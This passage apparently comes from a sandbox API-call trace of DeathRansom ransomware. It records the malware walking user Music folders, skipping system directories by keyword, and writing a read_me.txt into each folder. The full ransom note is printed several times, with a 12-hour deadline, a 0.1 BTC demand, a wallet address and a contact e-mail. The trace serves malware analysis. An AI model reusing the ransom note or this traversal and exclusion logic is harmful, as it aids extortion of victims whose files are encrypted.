HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\gKB91HPUi4W1PdPGj.mp3") returned 108 [0075.765] FindNextFileW (in: hFindFile=0x7cfea68, lpFindFileData=0x17d0a0 | out: lpFindFileData=0x17d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7ec3810, ftCreationTime.dwHighDateTime=0x1d4d151, ftLastAccessTime.dwLowDateTime=0x55f96730, ftLastAccessTime.dwHighDateTime=0x1d4d24d, ftLastWriteTime.dwLowDateTime=0x55f96730, ftLastWriteTime.dwHighDateTime=0x1d4d24d, nFileSizeHigh=0x0, nFileSizeLow=0x12ab5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="gKB91HPUi4W1PdPGj.mp3", cAlternateFileName="GKB91H~1.MP3")) returned 0 [0075.765] FindClose (in: hFindFile=0x7cfea68 | out: hFindFile=0x7cfea68) returned 1 [0075.765] wnsprintfW (in: pszDest=0x8d710c8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\read_me.txt") returned 98 [0075.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\c3ErMl5xQUkjb\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\c3erml5xqukjb\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x764 [0075.765] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.765] WriteFile (in: hFile=0x764, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d304, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d304*=0x6b3, lpOverlapped=0x0) returned 1 [0075.766] CloseHandle (hObject=0x764) returned 1 [0075.766] GetProcessHeap () returned 0x4f10000 [0075.766] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d710c8 | out: hHeap=0x4f10000) returned 1 [0075.766] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa615c910, ftCreationTime.dwHighDateTime=0x1d4d271, ftLastAccessTime.dwLowDateTime=0xfa3aa460, ftLastAccessTime.dwHighDateTime=0x1d4cb01, ftLastWriteTime.dwLowDateTime=0xfa3aa460, ftLastWriteTime.dwHighDateTime=0x1d4cb01, nFileSizeHigh=0x0, nFileSizeLow=0x17720, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fS9GjsjJwR37CUgZ5.mp3", cAlternateFileName="FS9GJS~1.MP3")) returned 1 [0075.766] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\fS9GjsjJwR37CUgZ5.mp3") returned 94 [0075.767] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dc07d80, ftCreationTime.dwHighDateTime=0x1d4d31d, ftLastAccessTime.dwLowDateTime=0xfc0e4ae0, ftLastAccessTime.dwHighDateTime=0x1d4d370, ftLastWriteTime.dwLowDateTime=0xfc0e4ae0, ftLastWriteTime.dwHighDateTime=0x1d4d370, nFileSizeHigh=0x0, nFileSizeLow=0x2c9a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nVA6X.wav", cAlternateFileName="")) returned 1 [0075.767] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\nVA6X.wav") returned 82 [0075.767] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf13dbaf0, ftCreationTime.dwHighDateTime=0x1d4cde0, ftLastAccessTime.dwLowDateTime=0x11781cd0, ftLastAccessTime.dwHighDateTime=0x1d4d47a, ftLastWriteTime.dwLowDateTime=0x11781cd0, ftLastWriteTime.dwHighDateTime=0x1d4d47a, nFileSizeHigh=0x0, nFileSizeLow=0xf928, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="rncK.mp3", cAlternateFileName="")) returned 1 [0075.767] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\rncK.mp3") returned 81 [0075.767] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf13dbaf0, ftCreationTime.dwHighDateTime=0x1d4cde0, ftLastAccessTime.dwLowDateTime=0x11781cd0, ftLastAccessTime.dwHighDateTime=0x1d4d47a, ftLastWriteTime.dwLowDateTime=0x11781cd0, ftLastWriteTime.dwHighDateTime=0x1d4d47a, nFileSizeHigh=0x0, nFileSizeLow=0xf928, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="rncK.mp3", cAlternateFileName="")) returned 0 [0075.767] FindClose (in: hFindFile=0x7cfea28 | out: hFindFile=0x7cfea28) returned 1 [0075.767] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\read_me.txt") returned 84 [0075.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\_9bVvSR0NC3\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\_9bvvsr0nc3\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0075.767] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.767] WriteFile (in: hFile=0x7a4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d57c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d57c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.768] CloseHandle (hObject=0x7a4) returned 1 [0075.768] GetProcessHeap () returned 0x4f10000 [0075.768] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d410b0 | out: hHeap=0x4f10000) returned 1 [0075.768] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5eef1a30, ftCreationTime.dwHighDateTime=0x1d4c9c7, ftLastAccessTime.dwLowDateTime=0xc95dc200, ftLastAccessTime.dwHighDateTime=0x1d4cac5, ftLastWriteTime.dwLowDateTime=0xc95dc200, ftLastWriteTime.dwHighDateTime=0x1d4cac5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_9bvvsr0nc3", cAlternateFileName="_9BVVS~1")) returned 0 [0075.768] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0075.768] wnsprintfW (in: pszDest=0x8d210a0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\read_me.txt") returned 72 [0075.768] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0075.769] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.769] WriteFile (in: hFile=0x7b8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d7f4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d7f4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.769] CloseHandle (hObject=0x7b8) returned 1 [0075.770] GetProcessHeap () returned 0x4f10000 [0075.770] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d210a0 | out: hHeap=0x4f10000) returned 1 [0075.770] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15ae90, ftCreationTime.dwHighDateTime=0x1d4c681, ftLastAccessTime.dwLowDateTime=0x47ff8cc0, ftLastAccessTime.dwHighDateTime=0x1d4c778, ftLastWriteTime.dwLowDateTime=0x47ff8cc0, ftLastWriteTime.dwHighDateTime=0x1d4c778, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="rd8rDpgMK_O U_ RO", cAlternateFileName="RD8RDP~1")) returned 1 [0075.770] wnsprintfW (in: pszDest=0x8d01090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO") returned 72 [0075.770] lstrcmpW (lpString1="rd8rDpgMK_O U_ RO", lpString2="..") returned 1 [0075.770] lstrcmpW (lpString1="rd8rDpgMK_O U_ RO", lpString2=".") returned 1 [0075.770] StrStrW (lpFirst="rd8rdpgmk_o u_ ro", lpSrch="programdata") returned 0x0 [0075.770] StrStrW (lpFirst="rd8rdpgmk_o u_ ro", lpSrch="$recycle.bin") returned 0x0 [0075.770] StrStrW (lpFirst="rd8rdpgmk_o u_ ro", lpSrch="program files") returned 0x0 [0075.770] StrStrW (lpFirst="rd8rdpgmk_o u_ ro", lpSrch="windows") returned 0x0 [0075.770] StrStrW (lpFirst="rd8rdpgmk_o u_ ro", lpSrch="all users") returned 0x0 [0075.770] StrStrW (lpFirst="rd8rdpgmk_o u_ ro", lpSrch="appdata") returned 0x0 [0075.770] GetProcessHeap () returned 0x4f10000 [0075.770] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d210a0 [0075.770] lstrcpyW (in: lpString1=0x8d210a0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO" [0075.770] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 74 [0075.770] QueueUserWorkItem (Function=0x40a710, Context=0x8d210a0, Flags=0x0) returned 1 [0075.770] GetProcessHeap () returned 0x4f10000 [0075.770] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d410b0 [0075.770] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\*") returned 74 [0075.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\*", lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15ae90, ftCreationTime.dwHighDateTime=0x1d4c681, ftLastAccessTime.dwLowDateTime=0x47ff8cc0, ftLastAccessTime.dwHighDateTime=0x1d4c778, ftLastWriteTime.dwLowDateTime=0x47ff8cc0, ftLastWriteTime.dwHighDateTime=0x1d4c778, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0075.770] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\.") returned 74 [0075.770] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.771] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.771] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15ae90, ftCreationTime.dwHighDateTime=0x1d4c681, ftLastAccessTime.dwLowDateTime=0x47ff8cc0, ftLastAccessTime.dwHighDateTime=0x1d4c778, ftLastWriteTime.dwLowDateTime=0x47ff8cc0, ftLastWriteTime.dwHighDateTime=0x1d4c778, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.771] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\..") returned 75 [0075.771] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.771] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4463b4d0, ftCreationTime.dwHighDateTime=0x1d4ca4b, ftLastAccessTime.dwLowDateTime=0x85556830, ftLastAccessTime.dwHighDateTime=0x1d4c8c0, ftLastWriteTime.dwLowDateTime=0x85556830, ftLastWriteTime.dwHighDateTime=0x1d4c8c0, nFileSizeHigh=0x0, nFileSizeLow=0x1179f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="CbajF-WnH8JmAWUyb vs.m4a", cAlternateFileName="CBAJF-~1.M4A")) returned 1 [0075.771] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\CbajF-WnH8JmAWUyb vs.m4a") returned 97 [0075.771] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f098cf0, ftCreationTime.dwHighDateTime=0x1d4d128, ftLastAccessTime.dwLowDateTime=0xc8e8f060, ftLastAccessTime.dwHighDateTime=0x1d4d5ab, ftLastWriteTime.dwLowDateTime=0xc8e8f060, ftLastWriteTime.dwHighDateTime=0x1d4d5ab, nFileSizeHigh=0x0, nFileSizeLow=0xef30, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="eUUW3K55SiLSEX.mp3", cAlternateFileName="EUUW3K~1.MP3")) returned 1 [0075.771] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\eUUW3K55SiLSEX.mp3") returned 91 [0075.771] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb25cab0, ftCreationTime.dwHighDateTime=0x1d4c821, ftLastAccessTime.dwLowDateTime=0x3c81a1b0, ftLastAccessTime.dwHighDateTime=0x1d4d4b3, ftLastWriteTime.dwLowDateTime=0x3c81a1b0, ftLastWriteTime.dwHighDateTime=0x1d4d4b3, nFileSizeHigh=0x0, nFileSizeLow=0x14600, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Iy3mjA.m4a", cAlternateFileName="")) returned 1 [0075.771] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\Iy3mjA.m4a") returned 83 [0075.771] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1ee90, ftCreationTime.dwHighDateTime=0x1d4ce2b, ftLastAccessTime.dwLowDateTime=0xae42c5f0, ftLastAccessTime.dwHighDateTime=0x1d4c75b, ftLastWriteTime.dwLowDateTime=0xae42c5f0, ftLastWriteTime.dwHighDateTime=0x1d4c75b, nFileSizeHigh=0x0, nFileSizeLow=0x57dd, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Jk9z9eR5-bVH_B.wav", cAlternateFileName="JK9Z9E~1.WAV")) returned 1 [0075.771] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\Jk9z9eR5-bVH_B.wav") returned 91 [0075.771] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5976c10, ftCreationTime.dwHighDateTime=0x1d4ca6e, ftLastAccessTime.dwLowDateTime=0xdc2df850, ftLastAccessTime.dwHighDateTime=0x1d4c994, ftLastWriteTime.dwLowDateTime=0xdc2df850, ftLastWriteTime.dwHighDateTime=0x1d4c994, nFileSizeHigh=0x0, nFileSizeLow=0x8c5a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Q9VlqWAtF0-DWdezS2.wav", cAlternateFileName="Q9VLQW~1.WAV")) returned 1 [0075.771] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\Q9VlqWAtF0-DWdezS2.wav") returned 95 [0075.771] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc240e8f0, ftCreationTime.dwHighDateTime=0x1d4cb90, ftLastAccessTime.dwLowDateTime=0x1497ade0, ftLastAccessTime.dwHighDateTime=0x1d4c638, ftLastWriteTime.dwLowDateTime=0x1497ade0, ftLastWriteTime.dwHighDateTime=0x1d4c638, nFileSizeHigh=0x0, nFileSizeLow=0x16cde, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TeZH9 l1p.wav", cAlternateFileName="TEZH9L~1.WAV")) returned 1 [0075.771] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\TeZH9 l1p.wav") returned 86 [0075.771] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e2411b0, ftCreationTime.dwHighDateTime=0x1d4d1f4, ftLastAccessTime.dwLowDateTime=0xf600e110, ftLastAccessTime.dwHighDateTime=0x1d4c9ea, ftLastWriteTime.dwLowDateTime=0xf600e110, ftLastWriteTime.dwHighDateTime=0x1d4c9ea, nFileSizeHigh=0x0, nFileSizeLow=0x11b4c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="YHz3s62rTdR5SUCJ45.m4a", cAlternateFileName="YHZ3S6~1.M4A")) returned 1 [0075.771] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO\\YHz3s62rTdR5SUCJ45.m4a") returned 95 [0075.771] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e2411b0, ftCreationTime.dwHighDateTime=0x1d4d1f4, ftLastAccessTime.dwLowDateTime=0xf600e110, ftLastAccessTime.dwHighDateTime=0x1d4c9ea, ftLastWriteTime.dwLowDateTime=0xf600e110, ftLastWriteTime.dwHighDateTime=0x1d4c9ea, nFileSizeHigh=0x0, nFileSizeLow=0x11b4c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="YHz3s62rTdR5SUCJ45.m4a", cAlternateFileName="YHZ3S6~1.M4A")) returned 0 [0075.771] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0075.771] wnsprintfW (in: pszDest=0x8d410b0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 